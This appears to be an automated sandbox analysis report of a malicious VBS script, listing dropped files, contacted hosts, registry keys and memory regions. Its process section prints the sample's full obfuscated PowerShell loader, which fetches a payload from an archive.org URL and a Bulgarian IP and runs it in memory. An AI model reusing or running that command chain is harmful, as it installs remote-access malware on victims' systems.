Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
5fKvwnCAeC.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2amsj435.g4p.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i1fn0441.lbk.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lcnlpz4b.zmu.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sedqkmkm.5pl.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\loat\logs.dat
|
data
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\5fKvwnCAeC.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNIRUxsSWRbMV0rJHNoRWxsSURbMTNdKydYJykgKCgnRklpJysndXJsID0gOXVPaHR0cHMnKyc6LycrJy9pYTYwMCcrJzEwMC51cy5hcmNoJysnaScrJ3ZlLm9yZy8yNC8nKydpdGVtcy9kZScrJ3RhaC1ub3RlLScrJ3YvRGV0YScrJ2hOJysnb3QnKydlVi50eHQ5dU87JysnRkknKydpJysnYmFzZScrJzY0QycrJ29uJysndCcrJ2VuJysndCcrJyAnKyc9IChOZXctT2JqZWN0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQycrJ2xpJysnZW50KS5EJysnb3cnKydubCcrJ29hZCcrJ1N0cmluZyhGJysnSScrJ2knKyd1cicrJ2wpJysnO0ZJaWInKydpbmFyeUNvbicrJ3RlJysnbnQnKycgJysnPSBbU3lzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tQmEnKydzZTY0JysnU3QnKydyaW4nKydnJysnKEYnKydJaWJhcycrJ2UnKyc2NENvbnRlJysnbnQpO0ZJaWFzJysnc2VtJysnYmx5ID0gJysnW1JlZmxlJysnY3QnKydpb24uQXNzZW1ibHldOjpMbycrJ2FkKEZJaWJpbicrJ2FyJysneUMnKydvbnRlbnQpO0ZJaXR5JysncGUgPSBGSWlhc3MnKydlbScrJ2JseS5HZXQnKydUeXBlKDl1T1J1blAnKydFLkhvbWU5dScrJ08pO0ZJaW1ldGhvZCAnKyc9IEYnKydJJysnaXR5cGUnKycuR2V0TWV0JysnaG9kJysnKDl1T1ZBJysnSTl1Tyk7RicrJ0lpbWUnKyd0JysnaG8nKydkJysnLicrJ0ludm9rZScrJyhGSWknKyduJysndWwnKydsLCBbJysnb2JqZWMnKyd0W11dQCg5dU90eHQuRicrJ0MnKydDTVIvJysnNzExMi8zMjEuOTguMDkuJysnNTQvLzonKydwJysndCcrJ3RoOScrJ3VPICwgOXUnKydPZGVzYXRpdmFkbzknKyd1JysnTycrJyAsIDl1T2RlJysncycrJ2EnKyd0aScrJ3ZhZCcrJ285dU8gLCA5dU9kZXNhdGl2JysnYWRvOXVPLDl1T1JlZycrJ0FzbTl1Tyw5dU85JysndU8nKycpKScpLnJFUGxBQ2UoKFtjaEFSXTcwK1tjaEFSXTczK1tjaEFSXTEwNSksW3NUcmluZ11bY2hBUl0zNikuckVQbEFDZSgoW2NoQVJdNTcrW2NoQVJdMTE3K1tjaEFSXTc5KSxbc1RyaW5nXVtjaEFSXTM5KSk=';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
".( $sHELlId[1]+$shEllID[13]+'X') (('FIi'+'url = 9uOhttps'+':/'+'/ia600'+'100.us.arch'+'i'+'ve.org/24/'+'items/de'+'tah-note-'+'v/Deta'+'hN'+'ot'+'eV.txt9uO;'+'FI'+'i'+'base'+'64C'+'on'+'t'+'en'+'t'+'
'+'= (New-Object System.N'+'e'+'t'+'.Web'+'C'+'li'+'ent).D'+'ow'+'nl'+'oad'+'String(F'+'I'+'i'+'ur'+'l)'+';FIib'+'inaryCon'+'te'+'nt'+'
'+'= [System'+'.'+'Convert]::FromBa'+'se64'+'St'+'rin'+'g'+'(F'+'Iibas'+'e'+'64Conte'+'nt);FIias'+'sem'+'bly = '+'[Refle'+'ct'+'ion.Assembly]::Lo'+'ad(FIibin'+'ar'+'yC'+'ontent);FIity'+'pe
= FIiass'+'em'+'bly.Get'+'Type(9uORunP'+'E.Home9u'+'O);FIimethod '+'= F'+'I'+'itype'+'.GetMet'+'hod'+'(9uOVA'+'I9uO);F'+'Iime'+'t'+'ho'+'d'+'.'+'Invoke'+'(FIi'+'n'+'ul'+'l,
['+'objec'+'t[]]@(9uOtxt.F'+'C'+'CMR/'+'7112/321.98.09.'+'54//:'+'p'+'t'+'th9'+'uO , 9u'+'Odesativado9'+'u'+'O'+' , 9uOde'+'s'+'a'+'ti'+'vad'+'o9uO
, 9uOdesativ'+'ado9uO,9uOReg'+'Asm9uO,9uO9'+'uO'+'))').rEPlACe(([chAR]70+[chAR]73+[chAR]105),[sTring][chAR]36).rEPlACe(([chAR]57+[chAR]117+[chAR]79),[sTring][chAR]39))"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://45.90.89.123/2117/RMCCF.txt
|
45.90.89.123
|
|
|
|
45.90.89.98
|
|
||
|
http://geoplugin.net/json.gp
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
|
207.241.227.240
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://geoplugin.net/json.gp/C
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://ia600100.us.arX
|
unknown
|
||
|
https://ia600100.us.archive.org
|
unknown
|
||
|
http://45.90.89.123
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt9uO;FIibase64Content
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://oneget.org
|
unknown
|
||
|
http://ia600100.us.archive.org
|
unknown
|
There are 14 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
ia600100.us.archive.org
|
207.241.227.240
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
45.90.89.123
|
unknown
|
Bulgaria
|
|
|
|
45.90.89.98
|
unknown
|
Bulgaria
|
|
|
|
207.241.227.240
|
ia600100.us.archive.org
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-O0U3JA
|
exepath
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-O0U3JA
|
licence
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-O0U3JA
|
time
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 7 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
114B000
|
heap
|
page read and write
|
|
|
|
26F3DE40000
|
trusted library allocation
|
page read and write
|
|
|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
26F3D897000
|
trusted library allocation
|
page read and write
|
|
|
|
26F45F00000
|
trusted library section
|
page read and write
|
|
|
|
7FF7C0EA0000
|
trusted library allocation
|
page read and write
|
||
|
1F509ADA000
|
heap
|
page read and write
|
||
|
1F509B74000
|
heap
|
page read and write
|
||
|
759BF3B000
|
stack
|
page read and write
|
||
|
1EB02AD3000
|
heap
|
page read and write
|
||
|
7FF7C0F10000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0EE0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0F04000
|
trusted library allocation
|
page read and write
|
||
|
1EB03177000
|
trusted library allocation
|
page read and write
|
||
|
1F509B55000
|
heap
|
page read and write
|
||
|
7FF7C0ED0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0DE0000
|
trusted library allocation
|
page read and write
|
||
|
1F509AC4000
|
heap
|
page read and write
|
||
|
26F2EE8A000
|
trusted library allocation
|
page read and write
|
||
|
1F509B74000
|
heap
|
page read and write
|
||
|
759BBB7000
|
stack
|
page read and write
|
||
|
1EB00C90000
|
heap
|
page read and write
|
||
|
1F509AAB000
|
heap
|
page read and write
|
||
|
26F45A04000
|
heap
|
page read and write
|
||
|
759B9FE000
|
stack
|
page read and write
|
||
|
1F509ABA000
|
heap
|
page read and write
|
||
|
5BBE27E000
|
stack
|
page read and write
|
||
|
1F509C1A000
|
heap
|
page read and write
|
||
|
7FF7C0D2A000
|
trusted library allocation
|
page read and write
|
||
|
BC2EBFE000
|
stack
|
page read and write
|
||
|
1F509AA1000
|
heap
|
page read and write
|
||
|
759BD3F000
|
stack
|
page read and write
|
||
|
2AA0000
|
heap
|
page read and write
|
||
|
1EB00BB8000
|
heap
|
page read and write
|
||
|
7FF7C0C26000
|
trusted library allocation
|
page read and write
|
||
|
26F45990000
|
heap
|
page read and write
|
||
|
1F509AB8000
|
heap
|
page read and write
|
||
|
26F2D8A0000
|
trusted library allocation
|
page read and write
|
||
|
1F509B37000
|
heap
|
page read and write
|
||
|
759BC3C000
|
stack
|
page read and write
|
||
|
1EB02AD0000
|
heap
|
page read and write
|
||
|
26F2D290000
|
trusted library allocation
|
page read and write
|
||
|
1F509B1F000
|
heap
|
page read and write
|
||
|
7FF7C0C26000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0C2C000
|
trusted library allocation
|
page execute and read and write
|
||
|
12BE000
|
stack
|
page read and write
|
||
|
1EB024F0000
|
heap
|
page readonly
|
||
|
1F509C4B000
|
heap
|
page read and write
|
||
|
7FF7C0DF0000
|
trusted library allocation
|
page read and write
|
||
|
5BBE9BE000
|
stack
|
page read and write
|
||
|
26F2D821000
|
trusted library allocation
|
page read and write
|
||
|
1F509AA5000
|
heap
|
page read and write
|
||
|
26F2B8C9000
|
heap
|
page read and write
|
||
|
1EB02BA6000
|
heap
|
page read and write
|
||
|
1F509C3B000
|
heap
|
page read and write
|
||
|
1F509B50000
|
heap
|
page read and write
|
||
|
7FF7C0E80000
|
trusted library allocation
|
page read and write
|
||
|
5BBE63E000
|
stack
|
page read and write
|
||
|
26F3DB20000
|
trusted library allocation
|
page read and write
|
||
|
759B5EE000
|
stack
|
page read and write
|
||
|
1F509B5A000
|
heap
|
page read and write
|
||
|
759C90E000
|
stack
|
page read and write
|
||
|
26F2DE7A000
|
trusted library allocation
|
page read and write
|
||
|
5BBE3FC000
|
stack
|
page read and write
|
||
|
1EB025B0000
|
heap
|
page read and write
|
||
|
1F509B24000
|
heap
|
page read and write
|
||
|
7FF7C0E90000
|
trusted library allocation
|
page read and write
|
||
|
26F3EDAF000
|
trusted library allocation
|
page read and write
|
||
|
1EB02CCA000
|
trusted library allocation
|
page read and write
|
||
|
1F507CE0000
|
heap
|
page read and write
|
||
|
7FF7C0D30000
|
trusted library allocation
|
page execute and read and write
|
||
|
26F2EF0E000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0E10000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0D52000
|
trusted library allocation
|
page read and write
|
||
|
1EB0310A000
|
trusted library allocation
|
page read and write
|
||
|
1F509C31000
|
heap
|
page read and write
|
||
|
1EB00C66000
|
heap
|
page read and write
|
||
|
7FF7C0B8B000
|
trusted library allocation
|
page read and write
|
||
|
5BBE47E000
|
stack
|
page read and write
|
||
|
1EB02CA1000
|
trusted library allocation
|
page read and write
|
||
|
F30000
|
heap
|
page read and write
|
||
|
7FF7C0D12000
|
trusted library allocation
|
page read and write
|
||
|
1F509AA0000
|
heap
|
page read and write
|
||
|
26F45930000
|
heap
|
page execute and read and write
|
||
|
7FF7C0B74000
|
trusted library allocation
|
page read and write
|
||
|
26F2B870000
|
heap
|
page read and write
|
||
|
1F509AEB000
|
heap
|
page read and write
|
||
|
7FF7C0D70000
|
trusted library allocation
|
page read and write
|
||
|
26F2F186000
|
trusted library allocation
|
page read and write
|
||
|
26F45985000
|
heap
|
page read and write
|
||
|
26F45BC0000
|
heap
|
page read and write
|
||
|
7FF7C0D60000
|
trusted library allocation
|
page execute and read and write
|
||
|
26F2B860000
|
heap
|
page read and write
|
||
|
BC2F0FE000
|
stack
|
page read and write
|
||
|
7FF7C0F13000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0E80000
|
trusted library allocation
|
page read and write
|
||
|
26F2DE26000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0C90000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EB00B70000
|
heap
|
page read and write
|
||
|
759BB3E000
|
stack
|
page read and write
|
||
|
1EB02BAC000
|
heap
|
page read and write
|
||
|
1F509ACE000
|
heap
|
page read and write
|
||
|
10DE000
|
stack
|
page read and write
|
||
|
474000
|
remote allocation
|
page execute and read and write
|
||
|
1EB02B1A000
|
heap
|
page read and write
|
||
|
1F507B4E000
|
heap
|
page read and write
|
||
|
26F2BA90000
|
heap
|
page read and write
|
||
|
26F2D6F0000
|
heap
|
page read and write
|
||
|
26F45C34000
|
heap
|
page read and write
|
||
|
1F509AB3000
|
heap
|
page read and write
|
||
|
1EB03240000
|
trusted library allocation
|
page read and write
|
||
|
1EB025B6000
|
heap
|
page read and write
|
||
|
5BBE738000
|
stack
|
page read and write
|
||
|
5BBE7BB000
|
stack
|
page read and write
|
||
|
26F45973000
|
heap
|
page read and write
|
||
|
7FF7C0F08000
|
trusted library allocation
|
page read and write
|
||
|
759B97F000
|
stack
|
page read and write
|
||
|
26F2DE72000
|
trusted library allocation
|
page read and write
|
||
|
BC2F2FB000
|
stack
|
page read and write
|
||
|
5BBE2FE000
|
stack
|
page read and write
|
||
|
5BBE73E000
|
stack
|
page read and write
|
||
|
7FF7C0E20000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0DB0000
|
trusted library allocation
|
page read and write
|
||
|
26F2EF2E000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0B7D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F509AB0000
|
heap
|
page read and write
|
||
|
1F507B38000
|
heap
|
page read and write
|
||
|
1EB02D5A000
|
trusted library allocation
|
page read and write
|
||
|
1F509B75000
|
heap
|
page read and write
|
||
|
1F509C4B000
|
heap
|
page read and write
|
||
|
127C000
|
stack
|
page read and write
|
||
|
1F507B9F000
|
heap
|
page read and write
|
||
|
1F509C11000
|
heap
|
page read and write
|
||
|
1F509AD3000
|
heap
|
page read and write
|
||
|
1F509C4B000
|
heap
|
page read and write
|
||
|
7FF7C0B73000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F509B74000
|
heap
|
page read and write
|
||
|
5BBE5F9000
|
stack
|
page read and write
|
||
|
1EB02D99000
|
trusted library allocation
|
page read and write
|
||
|
26F45940000
|
heap
|
page read and write
|
||
|
7FF7C0D52000
|
trusted library allocation
|
page read and write
|
||
|
759BDBF000
|
stack
|
page read and write
|
||
|
7FF7C0E30000
|
trusted library allocation
|
page read and write
|
||
|
1F509C2E000
|
heap
|
page read and write
|
||
|
EFC000
|
stack
|
page read and write
|
||
|
1F509B74000
|
heap
|
page read and write
|
||
|
1F509C4B000
|
heap
|
page read and write
|
||
|
1EB00B79000
|
heap
|
page read and write
|
||
|
1EB12C4F000
|
trusted library allocation
|
page read and write
|
||
|
26F2EF21000
|
trusted library allocation
|
page read and write
|
||
|
1F509AAE000
|
heap
|
page read and write
|
||
|
111C000
|
stack
|
page read and write
|
||
|
759B8FD000
|
stack
|
page read and write
|
||
|
26F4598D000
|
heap
|
page read and write
|
||
|
7FF7C0D90000
|
trusted library allocation
|
page read and write
|
||
|
1F509B3C000
|
heap
|
page read and write
|
||
|
7FF7C0DB0000
|
trusted library allocation
|
page read and write
|
||
|
1F509B74000
|
heap
|
page read and write
|
||
|
7FF7C0DC0000
|
trusted library allocation
|
page read and write
|
||
|
1140000
|
heap
|
page read and write
|
||
|
1F509ACB000
|
heap
|
page read and write
|
||
|
7FF7C0C56000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F509ADF000
|
heap
|
page read and write
|
||
|
1EB00BFC000
|
heap
|
page read and write
|
||
|
1EB00C70000
|
heap
|
page read and write
|
||
|
26F2B8FE000
|
heap
|
page read and write
|
||
|
26F2D670000
|
heap
|
page read and write
|
||
|
7DF4526C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5BBEA3B000
|
stack
|
page read and write
|
||
|
1EB00E50000
|
heap
|
page read and write
|
||
|
1EB02D40000
|
trusted library allocation
|
page read and write
|
||
|
1EB00C58000
|
heap
|
page read and write
|
||
|
7FF7C0D40000
|
trusted library allocation
|
page execute and read and write
|
||
|
759C98D000
|
stack
|
page read and write
|
||
|
1F507AE0000
|
heap
|
page read and write
|
||
|
1F509AC7000
|
heap
|
page read and write
|
||
|
1F509AC4000
|
heap
|
page read and write
|
||
|
1F509B74000
|
heap
|
page read and write
|
||
|
7FF7C0B7D000
|
trusted library allocation
|
page execute and read and write
|
||
|
5BBE83F000
|
stack
|
page read and write
|
||
|
5BBE8BE000
|
stack
|
page read and write
|
||
|
1EB02570000
|
trusted library allocation
|
page read and write
|
||
|
2F8F000
|
stack
|
page read and write
|
||
|
1EB12CB6000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0EC0000
|
trusted library allocation
|
page read and write
|
||
|
26F2B904000
|
heap
|
page read and write
|
||
|
1F509ABF000
|
heap
|
page read and write
|
||
|
BC2E9FF000
|
stack
|
page read and write
|
||
|
26F2EF56000
|
trusted library allocation
|
page read and write
|
||
|
1EB12C41000
|
trusted library allocation
|
page read and write
|
||
|
1F507DE5000
|
heap
|
page read and write
|
||
|
26F2EF0A000
|
trusted library allocation
|
page read and write
|
||
|
1F509BA0000
|
heap
|
page read and write
|
||
|
7FF7C0D40000
|
trusted library allocation
|
page execute and read and write
|
||
|
26F45BF0000
|
heap
|
page read and write
|
||
|
1EB02AC6000
|
heap
|
page execute and read and write
|
||
|
26F3D821000
|
trusted library allocation
|
page read and write
|
||
|
1EB02D9F000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0E50000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0DD0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0C30000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F509C13000
|
heap
|
page read and write
|
||
|
1F507B10000
|
heap
|
page read and write
|
||
|
1EB03138000
|
trusted library allocation
|
page read and write
|
||
|
1F509C3C000
|
heap
|
page read and write
|
||
|
26F2DC46000
|
trusted library allocation
|
page read and write
|
||
|
1EB030E2000
|
trusted library allocation
|
page read and write
|
||
|
1F509B74000
|
heap
|
page read and write
|
||
|
26F45BC6000
|
heap
|
page read and write
|
||
|
26F2B900000
|
heap
|
page read and write
|
||
|
1EB00B83000
|
heap
|
page read and write
|
||
|
1F507B94000
|
heap
|
page read and write
|
||
|
26F2B945000
|
heap
|
page read and write
|
||
|
1F509AFF000
|
heap
|
page read and write
|
||
|
1EB024C0000
|
trusted library allocation
|
page read and write
|
||
|
5BBE6B6000
|
stack
|
page read and write
|
||
|
1EB02C30000
|
heap
|
page execute and read and write
|
||
|
1F509B61000
|
heap
|
page read and write
|
||
|
7FF7C0D30000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7C0DA0000
|
trusted library allocation
|
page read and write
|
||
|
1EB00BBE000
|
heap
|
page read and write
|
||
|
7FF7C0E90000
|
trusted library allocation
|
page read and write
|
||
|
1F509AA2000
|
heap
|
page read and write
|
||
|
759BE3E000
|
stack
|
page read and write
|
||
|
1F509C0E000
|
heap
|
page read and write
|
||
|
1F509B16000
|
heap
|
page read and write
|
||
|
7FF7C0C20000
|
trusted library allocation
|
page read and write
|
||
|
1F509AA6000
|
heap
|
page read and write
|
||
|
26F3E840000
|
trusted library allocation
|
page read and write
|
||
|
759BCB8000
|
stack
|
page read and write
|
||
|
308F000
|
stack
|
page read and write
|
||
|
BBC000
|
stack
|
page read and write
|
||
|
1EB1ADB0000
|
heap
|
page read and write
|
||
|
1EB00BB0000
|
heap
|
page read and write
|
||
|
2A90000
|
heap
|
page read and write
|
||
|
1F509B74000
|
heap
|
page read and write
|
||
|
7FF7C0D80000
|
trusted library allocation
|
page read and write
|
||
|
26F45BB0000
|
heap
|
page read and write
|
||
|
26F45C1A000
|
heap
|
page read and write
|
||
|
7FF7C0DA0000
|
trusted library allocation
|
page read and write
|
||
|
1EB02FC8000
|
trusted library allocation
|
page read and write
|
||
|
26F2B90C000
|
heap
|
page read and write
|
||
|
7FF7C0D90000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0C90000
|
trusted library allocation
|
page execute and read and write
|
||
|
5BBDFE3000
|
stack
|
page read and write
|
||
|
1EB02C5B000
|
trusted library allocation
|
page read and write
|
||
|
26F45900000
|
heap
|
page execute and read and write
|
||
|
7FF7C0D80000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0E40000
|
trusted library allocation
|
page read and write
|
||
|
1F509C64000
|
heap
|
page read and write
|
||
|
1F509AA4000
|
heap
|
page read and write
|
||
|
7FF7C0B70000
|
trusted library allocation
|
page read and write
|
||
|
1F509AE6000
|
heap
|
page read and write
|
||
|
1F509C26000
|
heap
|
page read and write
|
||
|
1F507C0D000
|
heap
|
page read and write
|
||
|
1F509B5C000
|
heap
|
page read and write
|
||
|
FC0000
|
heap
|
page read and write
|
||
|
1EB02480000
|
heap
|
page read and write
|
||
|
26F45BC8000
|
heap
|
page read and write
|
||
|
1F509B1C000
|
heap
|
page read and write
|
||
|
759B56E000
|
stack
|
page read and write
|
||
|
BC2E5BA000
|
stack
|
page read and write
|
||
|
7FF7C0D70000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0E50000
|
trusted library allocation
|
page read and write
|
||
|
1EB00C69000
|
heap
|
page read and write
|
||
|
1F507AD0000
|
heap
|
page read and write
|
||
|
26F2D810000
|
heap
|
page execute and read and write
|
||
|
BC2EEFE000
|
stack
|
page read and write
|
||
|
7FF7C0E00000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0B72000
|
trusted library allocation
|
page read and write
|
||
|
1F509B48000
|
heap
|
page read and write
|
||
|
1EB024E0000
|
trusted library allocation
|
page read and write
|
||
|
26F2D6B0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0EF1000
|
trusted library allocation
|
page read and write
|
||
|
BC2F1FE000
|
stack
|
page read and write
|
||
|
26F45BF9000
|
heap
|
page read and write
|
||
|
26F45C36000
|
heap
|
page read and write
|
||
|
26F2D2B0000
|
trusted library allocation
|
page read and write
|
||
|
1F509AA5000
|
heap
|
page read and write
|
||
|
7FF7C0B80000
|
trusted library allocation
|
page read and write
|
||
|
1F509CA1000
|
heap
|
page read and write
|
||
|
478000
|
remote allocation
|
page execute and read and write
|
||
|
7FF7C0C20000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0C2C000
|
trusted library allocation
|
page execute and read and write
|
||
|
26F2B908000
|
heap
|
page read and write
|
||
|
1F509B2B000
|
heap
|
page read and write
|
||
|
1EB00A90000
|
heap
|
page read and write
|
||
|
F9E000
|
stack
|
page read and write
|
||
|
7FF7C0C56000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7C0B73000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F509AA2000
|
heap
|
page read and write
|
||
|
F20000
|
heap
|
page read and write
|
||
|
26F2F52C000
|
trusted library allocation
|
page read and write
|
||
|
5BBE37F000
|
stack
|
page read and write
|
||
|
26F45A24000
|
heap
|
page read and write
|
||
|
1F509AC2000
|
heap
|
page read and write
|
||
|
FA0000
|
heap
|
page read and write
|
||
|
26F2EF32000
|
trusted library allocation
|
page read and write
|
||
|
26F2D250000
|
heap
|
page read and write
|
||
|
1F509CA0000
|
heap
|
page read and write
|
||
|
7FF7C0E60000
|
trusted library allocation
|
page read and write
|
||
|
26F45A40000
|
heap
|
page read and write
|
||
|
1F509AE7000
|
heap
|
page read and write
|
||
|
26F3E8D9000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0DC0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0C30000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C8F000
|
stack
|
page read and write
|
||
|
2D8F000
|
stack
|
page read and write
|
||
|
1F509B1B000
|
heap
|
page read and write
|
||
|
1F509C27000
|
heap
|
page read and write
|
||
|
26F45937000
|
heap
|
page execute and read and write
|
||
|
7FF7C0DE0000
|
trusted library allocation
|
page read and write
|
||
|
1EB02D54000
|
trusted library allocation
|
page read and write
|
||
|
26F2D620000
|
trusted library allocation
|
page read and write
|
||
|
1EB02D57000
|
trusted library allocation
|
page read and write
|
||
|
1F509C3C000
|
heap
|
page read and write
|
||
|
26F2D2D6000
|
heap
|
page read and write
|
||
|
26F2E87A000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0E40000
|
trusted library allocation
|
page read and write
|
||
|
1F509AAE000
|
heap
|
page read and write
|
||
|
1F507BE5000
|
heap
|
page read and write
|
||
|
1F509B74000
|
heap
|
page read and write
|
||
|
5BBE57E000
|
stack
|
page read and write
|
||
|
1EB02C41000
|
trusted library allocation
|
page read and write
|
||
|
26F2D680000
|
trusted library allocation
|
page read and write
|
||
|
1F509AF2000
|
heap
|
page read and write
|
||
|
1F509C11000
|
heap
|
page read and write
|
||
|
1EB03132000
|
trusted library allocation
|
page read and write
|
||
|
26F3DB12000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0E10000
|
trusted library allocation
|
page read and write
|
||
|
1EB02A30000
|
heap
|
page read and write
|
||
|
1F509C16000
|
heap
|
page read and write
|
||
|
26F2D2C0000
|
heap
|
page readonly
|
||
|
26F2B91E000
|
heap
|
page read and write
|
||
|
FC5000
|
heap
|
page read and write
|
||
|
12E0000
|
heap
|
page read and write
|
||
|
7FF7C0DD0000
|
trusted library allocation
|
page read and write
|
||
|
1F509ACE000
|
heap
|
page read and write
|
||
|
1F509D2D000
|
heap
|
page read and write
|
||
|
1F509AA3000
|
heap
|
page read and write
|
||
|
26F2F527000
|
trusted library allocation
|
page read and write
|
||
|
1F509B30000
|
heap
|
page read and write
|
||
|
26F45C0C000
|
heap
|
page read and write
|
||
|
7FF7C0D2A000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0B74000
|
trusted library allocation
|
page read and write
|
||
|
1F509B43000
|
heap
|
page read and write
|
||
|
1F509B1F000
|
heap
|
page read and write
|
||
|
1F509660000
|
heap
|
page read and write
|
